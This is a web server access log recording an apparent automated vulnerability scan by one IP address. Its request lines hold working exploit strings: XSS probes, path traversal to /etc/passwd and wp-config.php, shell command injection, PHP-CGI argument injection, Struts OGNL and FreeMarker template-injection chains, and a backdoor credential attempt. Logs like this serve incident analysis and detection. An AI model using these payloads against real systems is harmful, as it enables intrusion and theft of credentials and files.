195.164.49.69 - - [18/Nov/2024:23:14:30 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:14:30 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:14:33 +0000] GET /_profiler/phpinfo?+--env=dev HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:14:37 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:14:40 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:23:14:54 +0000] GET /web.config.i18n.ashx?l=jsted&v=jsted HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:14:59 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:15:07 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:15:39 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:15:41 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:15:42 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:15:46 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:15:48 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
83.212.98.101 - - [18/Nov/2024:23:15:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:15:50 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:15:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:15:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:15:58 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
- - - [18/Nov/2024:23:16:00 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:16:03 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:16:05 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:16:10 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:16:14 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:16:14 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:16:15 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:16:15 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:16:18 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:16:22 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:16:37 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=jsted&v=jsted HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:16:38 +0000] GET /s/2p2jRMgDkxjbR1H1rhEjcE5622V/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
- - - [18/Nov/2024:23:16:44 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:17:06 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:17:24 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:17:25 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:17:28 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:17:29 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:17:31 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:23:17:33 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:23:17:35 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:17:37 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:17:39 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
83.212.98.101 - - [18/Nov/2024:23:17:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:17:41 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:17:43 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:17:44 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:17:46 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:17:48 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:17:50 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:17:52 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:18:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:18:14 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:18:20 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:18:29 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:18:43 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:18:58 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
195.164.49.69 - - [18/Nov/2024:23:19:03 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:19:04 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:19:06 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:19:09 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:19:10 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:19:12 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:19:14 +0000] GET /threaddump HTTP/1.1 404 1084
- - - [18/Nov/2024:23:19:18 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:19:20 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/WfTD.css HTTP/1.1 404 1178
195.164.49.69 - - [18/Nov/2024:23:19:22 +0000] GET /actuator/env HTTP/1.1 404 1090
127.0.0.1 - - [18/Nov/2024:23:19:23 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:19:25 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:19:27 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:19:29 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:19:33 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:19:41 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:19:44 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:19:52 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:20:06 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:20:08 +0000] GET /?pretty HTTP/1.1 200 11204
- - - [18/Nov/2024:23:20:14 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:20:37 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:20:42 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:20:44 +0000] GET /SetupWizard.aspx/eVCmYbZWXg HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:20:46 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:20:48 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
83.212.98.101 - - [18/Nov/2024:23:20:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:20:51 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:20:51 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:20:53 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:20:55 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:20:57 +0000] GET /passwordrecovered.cgi?id=ZiLY1 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:20:59 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/DMzM.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:23:21:01 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:21:02 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:21:04 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:21:08 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:21:20 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:21:22 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:21:31 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:21:33 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:21:45 +0000] GET /s/2p2jRMWWqC70nJi4NltXXaYT3aa/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:21:47 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:21:49 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:22:09 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:22:18 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:22:25 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:23:22:27 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:22:29 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:22:32 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:22:36 +0000] GET /actuators/logfile HTTP/1.1 404 1095
83.212.98.101 - - [18/Nov/2024:23:22:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:22:43 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:22:45 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:22:49 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:22:57 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:22:59 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:23:15 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:23:23:17 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:23:19 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:23:21 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:23:23 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:23:24 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:23:26 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:23:28 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:24:31 +0000] POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:24:33 +0000] POST /scripts/setup.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:24:36 +0000] POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 404 1158
195.164.49.69 - - [18/Nov/2024:23:24:40 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:24:42 +0000] GET /reports/rwservlet/showenv HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:24:46 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 404 1161
195.164.49.69 - - [18/Nov/2024:23:24:47 +0000] POST /website/blog/ HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:24:49 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:23:24:53 +0000] PUT /poc.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:24:56 +0000] GET /api/experimental/test HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:24:58 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/kvm?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/admin?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/apply?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/non-CA-rev?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/cgitest?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/checkCookie?LD_DEBUG=help HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/check_user?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:25:20 +0000] GET /cgi-bin/chn/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/cht/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/cnswebserver?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/config?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/configure/set_link_neg?LD_DEBUG=help HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/configure/swports_adjust?LD_DEBUG=help HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/eng/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/firmware?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/getCheckCode?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:25:21 +0000] GET /cgi-bin/get_status?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/getmac?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/getparam?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/guest/Login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/home?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/htmlmgr?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/index?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/index/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:25:22 +0000] GET /cgi-bin/jscript?LD_DEBUG=help HTTP/1.1 404 1093
